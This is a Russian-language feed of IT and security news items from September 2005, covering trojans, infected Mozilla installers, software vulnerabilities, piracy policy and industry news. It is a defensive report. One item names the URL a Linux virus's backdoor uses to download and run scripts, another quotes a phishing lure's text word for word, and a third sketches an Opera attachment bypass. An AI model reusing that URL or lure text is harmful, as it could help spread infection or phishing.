Вице-президент Еврокомиссии Франко Фраттини (Franco Frattini) в среду сообщил общественности о планах этого ведомства по созданию общеевропейского цифрового архива, в котором бы в течение года хранились все записи телефонных разговоров в странах ЕС, а также весь сгенерированный европейскими пользователями интернет-трафик, в частности - сообщения электронной почты. Таким образом европейские власти надеются получить мощный инструмент для противодействия терроризму и организованной преступности. Как отмечает агентство Reuters, собственный план по созданию аналогичной системы также существует у администрации непосредственно Евросоюза. Он в настоящее время обсуждается властями европейских стран. Впервые идея создания подобного инструмента возникла после терактов 11 марта 2004 года в Мадриде. Правоохранительные органы с помощью такой системы могли бы отслеживать переписку и переговоры подозреваемых в совершении тех или иных преступлений, причем интерес представляют даже неудачные или "законспирированные" телефонные звонки, так как по записям о них можно определить вызываемые номера, а также место и время совершения звонка.
Источник

22/09/2005 16:10 CD и DVD исчезнут с лотков
Запретить продажу с лотков CD и DVD предложил во вторник на пресс-конференции в Москве начальник департамента экономической безопасности МВД РФ Сергей Мещеряков. Цель данной меры – борьба с контрафактной продукцией. Такие акции уже неоднократно проводились, однако никаких значимых результатов не принесли. Ранее борьбой с пиратскими дисками занималась прокуратура, теперь эти функции переданы МВД. Однако участники рынка уверены, что и на этот раз дело не сдвинется с мертвой точки: у МВД также не получится победить "пиратов". Единственным результатом акции станет рост поборов с "лоточников". В России существует 42 предприятия, которые легально изготавливают и тиражируют компьютерные и видеодиски. По неофициальным данным, часть этих заводов выпускают и пиратскую продукцию. Российские правоохранительные органы не первый год безуспешно борются с этой проблемой. Считается, что бюджет РФ недополучает десятки миллиардов рублей в результате деловой активности пиратов. В рамках борьбы с этим повсеместным явлением 12 июля 2003 г. Михаил Касьянов подписал Постановление № 421 Правительства РФ о запрете на торговлю видео- и аудиопродукцией с использованием лотков и палаток. Однако до сих пор постановление игнорируется распространителями всех видов дисков. В рамках все той же борьбы 8 сентября этого года на заседании правительства России рассматривался вопрос о передаче права вести дознание и следствие в отношении производителей контрафактной продукции от прокуратуры к органам внутренних дел. Правительство РФ одобрило данный проект федерального закона и приняло решение внести его в Государственную Думу. МВД РФ хочет запретить продажу CD и DVD с лотков, ужесточить выдачу лицензий, лицензировать производство программной продукции и запретить выпуск полиграфической продукции без разрешения правообладателя.
Более подробно

22/09/2005 13:43 Выпущен первый ПК со встроенным сканером отпечатков
Компания NEC Computers представила настольный компьютер, оснащенный биометрическим сенсором, который считывает отпечатки пальцев. Биометрический сенсор TruePrint встроен в клавиатуру iXtreme Gold Desktop; он используется для идентификации личности пользователя в системе и в ряде случаев избавляет от необходимости вводить пароли (в частности, при загрузке профиля пользователя в Windows XP).
Источник

22/09/2005 12:41 Эксперты предупреждают об электронной поздравительной открытке
Эксперты компании SophosLabs предупреждают об электронной поздравительной открытке, которую спамеры рассылают по почтовым адресам по всему миру, которая пытается установить на пользовательский компьютер троянскую программу. Спамовое сообщение имеет следующие характеристики.
Тема письма:
You got a greeting card
Само письмо:
Hello
You got a greeting card. Click on the below link to collect your card.
Best Regards
Если пользователи пойдут по содержащейся в письме ссылке, то на их компьютер будет загружена вредоносная троянская программа Troj/Dloader-UT. Как только троян попадает на компьютер-жертву, хакеры могут удаленно шпионить за активностью пользователя ПК, наблюдать за нажатием клавиш на клавиатуре и воровать пароли. "Вы можете думать, что получили поздравительную открытку от таинственного поклонника, но фактически это хакер, имеющий нездоровый к вам интерес", – сказала Кэрол Терио, старший консультант Sophos по безопасности. "Людям, на самом деле, следует дважды подумать, прежде чем воспользоваться ссылкой в незапрашиваемом письме, иначе они могут подвергнуть риску свои конфиденциальные данные и финансы". Эксперты компания Sophos отмечают рост тенденции по использованию хакерами спамовых технологий с целью заразить как можно больше потенциальных жертв. "Все чаще и чаще мы наблюдаем как создатели троянских и шпионских программ используют спамовые технологии для того, чтобы максимизировать число инфицированных компьютеров", – продолжает Терио. "Важно, чтобы все пользователи применяли на своих компьютерах современное ПО, защищающее от атак самых последних вирусов, шпионских программ и спама".
Источник

22/09/2005 11:24 Новые UltraSparc
Представители Sun Microsystems объявили о выходе процессора UltraSparc IV+. Его тактовая частота - 1,5 ГГц, а не 1,8 ГГц, как изначально было обещано. Данный процессор - один из первых в семействе UltraSparc, снабженный встроенной кэш-памятью. Емкость встроенного кэша уровня 2 у UltraSparc IV+ составляет 2 Мбайт, уровня 3 - 32 Мбайт. Как сообщили в Sun, заявленную ранее тактовую частоту в 1,8 ГГц будет иметь следующая модель UltraSparc IV+. На базе нового процессора компания выпустила группу серверов - Sun Fire V490, V890, E2900, E4900 и E6900. Стоимость этих систем начинается с цифры 31 тыс. долл. Как сообщается, по цене они такие же, как и предыдущие модели на базе UltraSparc IV, по уровню теплоотделения - тоже. Однако производительность у новых систем, как заявляют в Sun, - вдвое более высокая. Процессор UltraSparc IV+ - первый из чипов Sun, имеющий топологический размер элемента 90 нм. Производит его по заказу для Sun компания Texas Instruments.
"Открытые системы"

22/09/2005 11:02 Правительство США объявило всемирные антипиратские инициативы
В среду администрация Буша представила планы развития своего наступления на международное пиратство. Во время калифорнийских встреч с представителями хайтек- и киноиндустрии министр торговли Карлос Гутьеррес рассказал о двух новых программах борьбы с нарушениями прав интеллектуальной собственности, которые, как указано в пресс-релизе, обходятся американскому бизнесу в $250 млрд и 750 тыс. рабочих мест в год. «Защита интеллектуальной собственности необходима для нашего экономического роста и конкуренции на мировом рынке и имеет решающее значение для успеха наших усилий по поддержанию безопасности и стабильности во всем мире», — сказал он. По одной из программ в регионы с высоким уровнем пиратства будут направлены эксперты по интеллектуальной собственности. Они должны работать с американскими предприятиями за рубежом и представителями органов государственной власти этих стран в целях укрепления защиты прав интеллектуальной собственности. Эксперты будут направлены в командировку на пять лет в Бразилию, Индию, Россию, Таиланд, Китай и в страны Ближнего Востока. Один такой эксперт уже работает в Пекине, но когда отправятся другие и кто это будет, пока не ясно. Другая программа, называемая «Всемирной академией прав интеллектуальной собственности», займется обучением иностранных судей, представителей правоохранительных органов и других заинтересованных лиц международному праву в сфере интеллектуальной собственности и эффективным методам работы. В 2006 году Академия, курируемая Бюро патентов и товарных знаков США, планирует провести 24 сессии, оплачивая иностранным слушателям, которые будут съезжаться из большинства тех же стран, где будут работать эксперты, все транспортные расходы.
ZDNet

22/09/2005 10:33 Mozilla для Linux с вирусом RST.b в комплекте
Ситуации, когда на публичных серверах выкладывались версии зараженных бинарных или исходных файлов возникали уже не раз. Теперь подобная участь постигла mozilla.org. Зараженными оказались дистрибутивы Mozilla и Thunderbird для Linux c корейской локализацией. Файлы mozilla-installer-bin из mozilla-1.7.6.ko-KR.linux-i686.installer.tar.gz и mozilla-xremote-client из thunderbird-1.0.2.tar.gz были инфицированы вирусом RST.b. Virus.Linux.RST.b ищет исполняемые ELF-файлы в текущем каталоге и каталоге /bin и заражает их. При заражении записывается в середину файла (в конец секции кода, сдвигая вниз все остальные секции файла). Также содержит бэкдор-процедуру, которая скачивает специальный скрипт-файл с сайта http://ns1.xoasis.com/~telcom69 и выполняет присутствующие в скрипте команды. Для выполнения этих команд используется стандартный shell. После троекратного уведомления mozilla.org файлы так и не были удалены.
Веблог "Лаборатории Касперского"

22/09/2005 09:25 Rambler и ICQ официально представили русскую "аську"
Израильско-американская компания ICQ и российский интернет-холдинг Rambler в среду официально объявили о запуске совместного проекта Rambler-ICQ, который является российской версией самой популярной в мире службы мгновенного обмена сообщениями (интернет-пейджинга) ICQ. Проект ICQ существует с 1996 года, он был создан в Израиле компанией Mirabilis, которая затем взяла имя ICQ и была в 1998 году выкуплена американской корпорацией America Online (AOL). За годы своего существования ICQ стала наиболее используемой жителями разных стран мира коммуникационной системой подобного рода. В России она также завоевала широкую популярность и известна многим потребителям под сленговым названием "аська". Как рассказал на посвященной открытию нового проекта пресс-конференции генеральный директор ICQ Ори Гиллиам, ранее его компания предоставляла пользователям ICQ дополнительные сервисы, большинство которых было актуально только для США, для пользователей из других стран они были бесполезны. Теперь ICQ намерена активно работать с компаниями-партнерами в разных странах мира - эти компании будут обслуживать интересы жителей той или иной страны и создавать локальные сервисы, которые будут интегрироваться в общемировую сеть ICQ. Rambler-ICQ - это, в частности, название клиентской программы, которая является адаптированной для русского рынка пятой (последней) версией базового клиента ICQ. Пользователи службы (сейчас в России насчитывается более 2 миллионов активных пользователей ICQ) смогут не только общаться привычным способом - с помощью обмена текстовыми сообщениями, - но и голосом. В систему Rambler-ICQ интегрирован клиент IP-телефонии, который позволяет общаться вслух в реальном времени в разных режимах - приема-передачи звуковых сообщений между двумя абонентами или в режиме "голосового чата".
Подробности

22/09/2005 09:15 Первый русский журнал об ОС Linux поступил в продажу
В России начинает выходить первый ежемесячный журнал на русском языке, целиком посвященный операционной системе Linux. Это русская версия популярного западного издания Linux Format, который выходит с 2000 года в британском издательстве Future Publishing. Как сообщили "Ленте.Ру" в редакции журнала, на этой неделе он поступил в розничную продажу - его можно найти в компьютерных магазинах и в книжных магазинах с компьютерной литературой. Русские издатели журнала пишут: "Редакционная политика - своевременное и полноценное информирование читательской аудитории о современном состоянии индустрии программного обеспечения с открытым кодом (open source), публикация обзоров о технологических новинках и обучающих программах, новости и интервью". В оригинальном издании традиционно освещается "широкий спектр вопросов от простых (обзоры ПО и детали установки и настройки) до сложных (системное администрирование и программирование под Linux)". Также заявляется, что среди целей журнала - "пропаганда свободного ПО в России, продвижение решений с открытым кодом в бизнес-сообществе, поддержка российского open source-сообщества, организация трибуны для разработчиков свободного ПО и обратная связь между разработчиками и потребителями ПО". Объем журнала - 114 полос, к каждому номеру прилагается DVD-диск, содержащий популярные дистрибутивы Linux/BSD и различные программные пакеты.
Lenta.Ru

21/09/2005 17:14 Уязвимость в phpBB2
Очередная уязвимость обнаружена в популярном ПО для создания форумов phpBB2. Как сообщается, уязвимость присутствует только в том случае, если в форуме поддерживается вставка аватар (картинка, привязанная к пользователю форума) с внешних (по отношению к серверу, на котором запущен форум) адресов. Подобная уязвимость может быть использована для получения служебной информации о пользователе, просмтаривающем форум (IP-адрес и тпи браузера). Подобная особенность не включена в phpBB по умолчанию, поэтому уязвимости присвоен стсатус некритичной. Присутствует в версиях до (включительно) 2.0.17.
Описание

21/09/2005 12:58 CISCO пересматривает программу сертификации
Известная компания CISCO сообщила (в лице Don Field, директоря по сертификации) об изменении программы сертификации специалистов по своим продуктам. В частности, добавился дополнительный экзамен и курс ("Securing Cisco Network Devices") в CCSP (Cisco Certified Security Professional), а также в программы сертификации по файрволлам, VPN и IDS. Как сказал Don Field, изменения вызваны изменившимися условиями на рынке сетевой безопасности. CISCO при сетификации предлагает следующую градацию уровня специалистов: associate level, professional, expert. Четвёртый уровень - specialist certification. Уровням соотвествуют следующие сертификаты (по возрастающей): CCNA, CCSP, CCIE (Cisco Certified Internetworking Expert), а также сертификаты по файрволлам, VPN и IDS.
Подробнее об изменениях

21/09/2005 11:52 Vista - самая лучшая версия Windows
Новая операционная система Microsoft, Vista, по утверждению председателя корпорации Билла Гейтса, станет самой лучшей версией за десять лет с момента выпуска Windows 95, и даже не потребует апгрейда аппаратного обеспечения. Об этом он заявил на Конференции профессиональных разработчиков в Лос-Анджелесе. Однако продавцы компьютеров, корпоративные покупатели и аналитики относятся к сказанному осторожно. На конференции были также представлены новый Office — 12, и ПО для веб-дизайна. Последнее, по словам разработчиков, имеет широкие возможностями — от совместной работы до создания сложных сайтов. Эти возможности зависят от набора технологий программирования WinFX, которые будут встроены в Vista. В новом Office появится WinFX-зависимая система Windows Workflow Foundation, управляющая потоками работ, позволяющая автоматически оповещать о событиях по электронной почте. По мнению г-на Гейтса, будет трудно удержаться, чтобы не купить новое ПО. «Мы хотим чтобы на рынке появились эти два основных синергетических релиза, и чтобы корпоративные клиенты сказали: „Давайте установим эти новые возможности на наши десктопы“». Vista может побить рекорд скорости внедрения для новых операционных систем, сказал вице-президент корпорации Джим Олчин (Jim Allchin). Порядка 475 млн. новых ПК с предустановленной системой будут проданы в течение двух лет с момента ее выпуска. Кроме того, сказал Олчин, пользователи захотят установить систему на несколько сот миллионов старых компьютеров. «У нас 10 лет не было продукта, который бы мог достичь таких показателейе», — заявил он. Для продвижения системы Microsoft предоставит возможность установки ее на машины, где нет графических чипов и объем памяти меньше 512 МБ, необходимых для запуска рабочего стола Aeroglass. «Даже если у вас нет мощности для расширенного пользования системой, вы сможете получить возможности, которые не требуют нового аппаратного обеспечения», — сказал Олчин.
CNews

21/09/2005 11:35 Выход Mozilla Firefox 1.0.7
Выпущена новая версия 1.0.7 популярного браузера Mozilla Firefox. Всем пользователям разработчики настоятельно рекомендую обновиться, потому что помимо обычных багофиксов в этой версии залатаны довольно серьёзные дыры в части безопасности. Русская сборка на настоящий момент отсутствует.
Подробности

21/09/2005 10:53 В Microsoft реорганизация; Оллчин уходит в отставку
Во вторник Microsoft объявила о широкомасштабной реорганизации компании, которая будет разделена на три отделения; одним из результатов этих перемен станет отставка многолетнего руководителя разработки Windows Джима Оллчина. План предусматривает деление Microsoft на три крупных части, у каждой из которых будет свой президент, подчиняющийся генеральному директору Microsoft Стиву Баллмеру. Джефф Рейкс (Jeff Raikes) возглавит отделение Business, в которое войдет группа Information Worker (включающая семейство продуктов Office) и группа бизнес-приложений Business Solutions. Кевин Джонсон (Kevin Johnson) и Джим Оллчин (Jim Allchin) станут сопрезидентами отделения Platform Products and Services, в которое войдут группы клиентских и серверных версий Windows, а также инструментов разработки и MSN. Оллчин будет занимать новый пост до выпуска Windows Vista в конце будущего года, после чего он намерен уйти в отставку. Робби Бейч (Robbie Bach) станет президентом отделения Entertainment and Devices, которое будет заниматься играми и разработкой мобильных устройств. Эта крупнейшая реорганизация призвана рационализировать процесс принятия решений компании и повысить качество разработки продуктов, говорится в заявлении Баллмера.
Подробности

21/09/2005 10:32 Ответ Mozilla на отчет о безопасности браузера
С точки зрения решения секьюрити-проблем Mozilla «находится в гораздо лучшей форме», чем Microsoft, утверждает организация. Mozilla отреагировала на опубликованный в понедельник отчет Symantec за первые шесть месяцев 2005 года, в котором утверждается, будто серьезные уязвимости в браузерах Mozilla обнаруживаются чаще, чем в Microsoft Internet Explorer. Президент Mozilla Europe Тристан Нито ответил на это, что когда обнаруживается уязвимость, Mozilla «лучше, чем Microsoft, способна отреагировать, найти решение и предоставить его пользователям». «Что касается нашей способности реагировать, то мы находимся в гораздо лучшей форме. Например, 6 сентября Mozilla сообщили о проблеме буфера IDN. 8 сентября эта информация была обнародована. Обычно мы просим своих разработчиков не упоминать ни о каких проблемах, пока мы их не исправим, но в данном случае ее по какой-то причине разгласили. 9 сентября мы внесли в конфигурацию изменение, устраняющее проблему IDN, которое пользователи могут произвести вручную, а также предоставили заплатку. Через десять дней у нас уже была новая версия, в которой эта проблема решена окончательно. А Microsoft? В этом месяце они решили пропустить секьюрити-патч, так что вообще никакие уязвимости устранены не будут. У нас такое просто невозможно». Нито утверждает также, что по данным секьюрити-фирмы Secunia, уязвимости Microsoft были более опасными и оставались таковыми в течение более продолжительного времени. За период с 2003 по 2005 год Secunia выпустила 22 предупреждения об уязвимостях Firefox 1.x и оценивает его уровень опасности «ниже критического». За тот же период Microsoft Internet Explorer 6.x было посвящено 85 предупреждений Secunia, а оценка уровня его опасности — «высококритический». «В целом их уязвимости опаснее. В Firefox — да, есть дыры, но они гораздо менее серьезны». Нито проиллюстрировал разницу между уязвимостями Firefox и IE на ранениях: «Что бы вы предпочли: сломанный палец или оторванную голову?»
Подробнее

21/09/2005 10:09 Еврокомиссия намекнула Microsoft на возможность новых санкций
Советник Еврокомиссии по вопросам конкуренции Нили Кроес (Neelie Kroes), в ведении которой находятся взаимоотношения Евросоюза и американской корпорации Microsoft, заявила в интервью газете International Herald Tribune, что европейские власти получают новые жалобы потребителей, касающиеся агрессивного поведения Microsoft на европейском рынке и фактов злоупотребления своим доминирующим положением. В связи с этим, заявила Кроес, Еврокомиссия может начать новое антимонопольное дело против корпорации, причем это может быть сделано не дожидаясь решения по новому апелляционному иску Microsoft. Как ранее сообщалось, корпорация в начале сентября начала оспаривать вступившее в силу с 1 июня этого года постановление Еврокомиссии о прекращении продаж в Европе ОС Windows XP со встроенной программой Windows Media Player и об изменении политики доступа к исходным кодам системы. Соответствующее указание Microsoft получила еще в марте 2004 года, около года она пыталась его оспорить, затем прекратила противодействие и согласилась на введение санкций, однако спустя три месяца начала новую тяжбу - сейчас заявление корпорации проходит процедуру рассмотрения в судебных инстанциях.
Lenta.Ru

21/09/2005 09:47 Уязвимость в почтовом клиенте Opera
Secunia Research сообщает об обнаружении 2-х уязвимостей в почтовом клиенте популярного браузера Opera. Первая связана с тем, что прикреплённый файл открывается без предупреждения пользователя прямо из директории кэширования, что может позволить выполнить произвольный JavaScript-объект с URL вида "file://". Вторая уязвимость связана с тем, что почтовый клиент определяет расширение файла по содержимому поля "Content-Type". Однако, добавив символ точки ('.') в конце имени файла, можно добиться того, что HTML-файл будет подменён файлом вида "image.jpg.". Как пишет Secunia Research, использование обоих уязвимостей может позволить злоумышленнику провести атаку типа внедрения скрипта (script insertion attacks). Уязвимости подвержены версии Opera до 8.02. Устранена в версии 8.50.
Подробности

20/09/2005 17:55 Закрыты израильские сайты eDonkey
Два израильских сайта, где пользователи могли найти ссылки на файлы, содержащиеся в пиринговой сети eDonkey, были закрыты на основании решения суда. Как сообщает сайт Ynet, речь идет о проектах Lionetwork и Lala, пользовавшихся наибольшей популярностью среди израильских участников p2p-сетей. Иск против сайтов был подан Израильской федерацией звукозаписывающей промышленности (IFPI Israel), а также аналогичной ассоциацией, представляющей интересы кинематографистов. Суд начал рассмотрение этих исков в феврале нынешнего года. Часть сайтов после этого перестала публиковать прямые ссылки на файлы в сети eDonkey. Против тех, кто продолжил эту практику, судебное разбирательство было доведено до конца
Подробности

20/09/2005 13:53 Новый троян отключает защитное ПО
«Диалог-Наука», официальный представитель компании Sophos в России, сообщает о появлении троянской программы, рассылаемый через спамовые письма, которая отключает системы безопасности на атакованных компьютерах. Троян рассылается по миллионам адресов по всему миру. В рассылаемых спам-письмах нет текста в поле «Тема:», но есть текст new price в теле письма и вложенный файл, который может иметь разные имена, включая такие как 09_price.zip, price_new.zip и price2.zip. Все вложенные ZIP-файлы содержат файл с именем price.exe, который и является вредоносной троянской программой Troj/BagleDl-U. Будучи запущенным, троян меняет реестр, запускает Windows Notepad с тем, чтобы отвлечь внимание пользователя ПК, и далее пытается отключить антивирусное и другое защитное ПО на зараженном компьютере, открывая тем самым «черный ход» для атак удаленных хакеров. Троян пытается также загрузить из интернета дополнительную порцию кода. «Разработчик трояна, используя спамовые технологии, агрессивно распространяет его через интернет с тем, чтобы заразить как можно больше уязвимых ПК за самый короткий промежуток времени», — говорит Грэм Клули, главный технологический консультант Sophos. Эксперты Sophos рекомендуют всем пользователям компьютеров убедится в том, что у них на ПК есть автоматически обновляемое антивирусное ПО, а также последние обновления систем защиты ОС и межсетевой экран.
Источник

20/09/2005 13:21 Открытый код не спасает от хакеров
Как показывает статистика, хакеры становятся все более изощренными и более корыстными. От их вторжения не защищает и переход на платформы, ранее считавшиеся более безопасными, чем разработки Microsoft, в том числе и с открытым исходным кодом. Согласно данным, приведенным в новом отчете Symantec, в первом полугодии 2005 г. хакерская активность, направленная на кражи и мошенничества, выросла как минимум в полтора раза. По оценкам Symantec, количество вирусов для платформы Microsoft Windows выросло на 48% по сравнению со вторым полугодием 2004 года и достигло почти 11 тыс. Эксперты отмечают использование злоумышленниками новых более совершенных инструментов и усложнение вирусного кода. 74% вирусов или троянских программ, попавших в список 50 наиболее активных за полугодие, крадут конфиденциальную информацию с зараженных компьютеров. В прошлом полугодии этот показатель составлял 54%. Увеличилось количество троянских программ, рассылающих спам через зараженные машины и устанавливающих без ведома пользователя всплывающие рекламные окна в браузерах (adware). Выросло количество так называемых «ботнетов» — сетей, в которые объединены зараженные компьютеры, управляемые злоумышленниками. Как правило, хакеры арендуют или сдают в аренду «ботнеты» через подпольные доски объявлений или чаты. Ежедневно в интернете действует 10532 «ботнетов», что на 140% больше, чем полгода назад. «С увеличением финансовой привлекательности хакерства, злоумышленники разрабатывают все более скрытый и вредоносный код, который отключает антивирусы, межсетевые фильтры, а также создает другие угрозы безопасности», — говорится в докладе. Эксперт по безопасности Symantec Винсент Вифер (Vincent Weafer) отмечает, что первые «кибервандалы» распространяли вирусы с целью повышения репутации в хакерском мире, но сейчас их мотивация связана с жаждой обогащения.
Подробнее

20/09/2005 12:19 Система контроля доступа GК-1 будет тестировать пассажиров в "Домодедово"
В понедельник в аэропорту "Домодедово" успешно завершились испытания системы контроля доступа GК-1 на основе технологии многоуровневого анализа голоса. Система разработана в Израиле, а испытания проводились российскими специалистами, пишет РИА "Новости" со ссылкой на сообщение "Домодедово". Новая система задает четыре вопроса пассажирам, отправленным на тестирование, анализирует психоэмоциональные характеристики голоса и принимает решение о направлении по зеленому или красному коридору. Опрос ведется в автоматическом режиме на родном языке тестируемого. На проверку одного пассажира система затрачивает от 30 до 90 секунд. Как отмечается в сообщении аэропорта, все результаты тестирования пассажиров на GК-1 полностью совпали с результатами независимого контроля и показали высокую эффективность системы. Система успешно диагностировала случаи, представляющие оперативный интерес. Систему GК-1 планируется использовать на рубежах безопасности, таможенного контроля и пограничного контроля. Применение новой системы позволит пресекать попытки совершения террористического акта, незаконного оборота оружия, боеприпасов, взрывчатых и отравляющих веществ, а также незаконного пересечения границы. Специалисты "Домодедово" уверены, что использование системы контроля доступа GК-1 в комплексе с другими средствами значительно повысит уровень авиационной безопасности в аэропорту.
РИА "Новости"

20/09/2005 11:48 Популярный браузер Opera стал бесплатным
Популярный норвежский баузер Opera, который используют многие интернет-пользователи мира, стал бесплатным и свободным от рекламы. Долгое время он оставался единственным браузером на рынке, за который его создатели требовали плату - за деньги можно было получить "обычную" версию, а без оплаты можно было пользоваться только версией программы со встроенным баннером. Недавно создатели браузера отметили 10-летие своего продукта - 30 августа все желающие в течение суток могли скачать специальную бесплатную модификацию продукта. Эта акция заявлялась как однодневная, но теперь браузер становится бесплатным перманентно. В браузере Opera были применены многие новые методы, которые позволяли оптимизировать работу и были новыми для рынка (например, так называемые "табы"). Тем не менее, рыночная доля браузера всегда оставалась небольшой, хотя точно подсчитать ее затруднительно - Opera, как правило, использует при связи с серверами идентификатор приложения, идентичный идентификатору MSIE. Бесплатную версию Opera 8.50 можно скачать с сайта компании Opera Software в вариантах для разных ОС и с разными языковыми интерфейсами
Lenta.Ru

20/09/2005 11:16 Symantec: браузеры Mozilla более уязвимы, чем IE
Согласно отчету Symantec, веб-браузеры Mozilla потенциально более уязвимы к атакам, чем Microsoft Internet Explorer. Однако в этом же отчете, опубликованном в понедельник, говорится, что хакеры все еще концентрируют свои усилия в основном на IE. Браузеры open source от Mozilla Foundation, такие как популярный Firefox, обычно считались более безопасными, чем IE, в прошлом страдавший от многих секьюрити-проблем. В начале этого года президент Mozilla Митчелл Бейкер сказала, что этот браузер принципиально надежнее, чем IE. Она предсказала также, что браузерам Mozilla Foundation не будут угрожать такие проблемы, с какими сталкивается IE, даже когда их доля рынка увеличится. Том VIII «Отчета об угрозах интернет-безопасности» Symantec содержит данные по первым шести месяцам текущего года, которые могут поколебать эту позицию. Согласно отчету, в первом полугодии 2005 года в браузерах Mozilla было обнаружено 25 подтвержденных поставщиком уязвимостей, «больше, чем у любого из исследуемых браузеров». 18 из них были классифицированы как особо опасные. «За тот же период в браузере IE было обнаружено 13 подтвержденных поставщиком уязвимостей, из которых как особо опасные были классифицированы восемь», — утверждают авторы отчета. Средний уровень опасности уязвимостей, связанных с браузерами IE и Mozilla, за этот период оценивается как «высокий»; по определению Symantec это означает «опасность для всей системы в случае использования» бага. Mozilla Foundation не ответила на просьбу дать комментарии для этой статьи. Symantec сообщила, что интервал времени между сообщениями об уязвимостях и появлением кода эксплойта сократился в среднем до шести дней. Однако из отчета не ясно, как быстро Microsoft и Mozilla выпускают поправки или как много уязвимостей пытались использовать хакеры, хотя Microsoft обычно выпускает патчи раз в месяц. Symantec признает, что «на момент написания отчета широкого использования уязвимостей какого-либо браузера, за исключением Microsoft Internet Explorer, не происходит», но добавляет, что «это положение может измениться, так как альтернативные браузеры становятся все более распространенными».
ZDNet

20/09/2005 10:34 Конституционный суд Литвы признал законным закрытие "Кавказ-центра"
Литовский Конституционный суд признал законными правила, на основании которых спецслужбы этой страны потребовали прекратить деятельность на территории Литвы интернет-сайта чеченских сепаратистов "Кавказ-центр", сообщает в понедельник агентство "Интерфакс" со ссылкой на представителя суда по печати Рамуне Сакалаускайте. "Утвержденные правительством Литвы правила контроля и ограничения распространения информации, не подлежащей распространению через компьютерные сети, не противоречили Конституции и закону об информировании общества", - сообщила представитель литовского правосудия. Следует отметить, что сайт "Кавказ-центр" в настоящее время размещается в Швеции на мощностях провайдера Port80.se. После того, как авторы сайта начали преследоваться российскими спецслужбами, сайт размещался в разное время в Литве и Финляндии. Финские власти удовлетворили поступившее требование РФ о запрещении деятельности сайта, разные инстанции властей Литвы принимали по российским запросам разные решения, но в итоге было определено, что такой сайт не может работать в этой стране, что и подтвердил в понедельник Конституционный суд. Кроме того, по сообщению РИА "Новости", в понедельник в Мосгорсуде пройдет рассмотрение кассационной жалобы адвоката журналиста "Кавказ-центра" Павла Люзакова, признанного 16 августа виновным в незаконном приобретении и хранении огнестрельного оружия и приговоренного к двум годам лишения свободы.
Источник

19/09/2005 11:59 Уязвимость в ClamAV
Сообщаетя о наличии уязвимостей в популярном в мире открытых систем антивирусе ClamAV. Обе связаны с некорректной обработкой сжатых файлов - одна с форматом UPX, вторая - FSG. Существование уязвимостей может позволить удалённому пользователю вызвать DoS и, теоретически - выполнить произвольный код в системе. Рекомендуется обновиться до версии 0.87.
Подробности

19/09/2005 11:22 Показательное избиение Cisco IOS
На сайте securitylab.ru уважаемым offtopic-ом опубликована довольно любопытная новость. 9го сентября в ЖЖ специалистом в области безопасности Андреем Владимировым (ака dr_nicodimus), известным как соавтор книги "Wi-Foo: The Secrets of Wireless Hacking", была опубликована информация об окончании «мозгового штурма», направленного на эксплуатацию уязвимостей в программном обеспечении продуктов компании Cisco. В результате исследования были разработаны методы внедрения кода в Cisco IOS и методы написания exploit и shellcode для этой платформы. Разработаны механизмы реализации кроссплатформенного червя для IOS. Обнаружено большое количество уязвимостей в «фирменном» протоколе маршрутизации EIGRP. Для демонстрации была проведена атака с одной Cisco на другую, в результате которой на атакуемой машине был запущен сервер IRC. Таким образом, можно констатировать, что показательное избиение «железных» маршрутизаторов Cisco возможно состоялось и это в очередной раз показывает опасность чрезмерного использования security trough obscurity. Остается надеяться, что Cisco учитывая опыт Microsoft, гораздо быстрее издаст «Пишем безопасный код», отучит по ней население Индии и выпустит Cisco IOS SP2.
Болле подробно

19/09/2005 10:42 Решение по домену .xxx снова отложено
Некоммерческая организация ICANN вновь не смогла найти в себе сил для принятия окончательного решения относительно судьбы порнографического домена .xxx. Домену .cat повезло несколько больше. Поскольку проблемы у виртуального квартала красных фонарей случились на самом высоком уровне (администрация президента Дж. Буша-мл., мягко говоря, не в восторге от появления домена ярко выраженной порнографической направленностью), то дирекция ICANN, при всей формальной независимости этой организации, пока просто не в состоянии воплотить в жизнь свое собственное решение. Поскольку принципиальное согласие на организацию новой зоны уже дано, дезавуировать собственное решение, сославшись на "политические трудности", значит – потерять лицо. Соответственно, окончательное одобрение отложено на "более поздний срок" до "уточнения некоторых пунктов контракта" с компанией ICM Register, которая будет (а может, и не будет) администрировать зону. Очевидно, что кто-то в ICANN читай байки о похождениях Ходжи Насреддина: рано или поздно либо ICM разорится, либо Дж. Буш-младший... уйдет на пенсию.
Internet.Ru

19/09/2005 10:06 Apple начинает борьбу с пиратами
С выпуском очередной ознакомительной версии OS X for Intel, - варианта операционной системы Apple для платформы x86, компания приняла первые меры противодействия пиратам, нелегально распространяющим программный продукт. Новая версия OS X for Intel, предназначенной для знакомства разработчиков, - 10.4.2. Предыдущие релизы распространяются по файлообменным сетям; существуют сайты, посвященные способам установки ОС на системы с различными процессорами, в том числе производства AMD. И это при том, что ранее представители Apple заявляли, что OS X сможет работать исключительно на компьютерах собственного производства компании. В версии 10.4.2 внесены изменения, препятствующие возможности запуска разработанных для нее приложений на предыдущих релизах ОС. В дальнейшем планируется принять более жесткие меры по защите программного продукта от нелегальной дистрибуции. Согласно сообщениям на Internet-форумах, посвященных x86-версии OS X, на ПК она загружается и работает быстрее, чем на Mac.
"Открытые системы"

19/09/2005 09:46 Gartner: не доверяйте безопасность одним технарям
Аналитическая фирма считает, что предприятия больше не должны позволять техническим специалистам диктовать им, как защитить свою сеть. Выступив на конференции Gartner IT Security Summit в Лондоне, вице-президент Gartner Джей Хейзер заявил, что фундаментальная проблема чисто технического подхода заключается в том, что профессионалы по ИТ-безопасности не понимают бизнеса. Предприятиям нужно выращивать и продвигать людей, разбирающихся не только в вопросах безопасности, но в хитросплетениях бизнеса. «Ответственный за управление рисками» теперь важнее, чем традиционный специалист по безопасности, который, одновременно занимаясь сетевым администрированием, видит свою задачу в том, чтобы «тянуть деньги из директора по ИТ» и блокируовать проекты, которые могли бы принести пользу организации, пояснил Хейзер. «Брандмауэром может управлять любой выпускник колледжа», — добавил он, призывая предприятия взяться за решение более важной задачи оценки собственных рисков и их приоритетов. В качестве примера компании, принявшей подход использования на руководящих должностях в сфере безопасности бизнес-ориентированных менеджеров, можно привести страхового гиганта Zurich. Стефан Вогт, директор Zurich по ИТ-рискам, рассказал участникам конференции, что его компания отдала на субподряд традиционные аспекты ИТ и безопасности, такие как управление брандмауэром, профилями пользователей и доступом к данным, сосредоточившись на более стратегических вопросах.
Подробности

18/09/2005 12:11 Прослушивание трафика на Cisco, атакуя через SNMP и не взирая на ACL
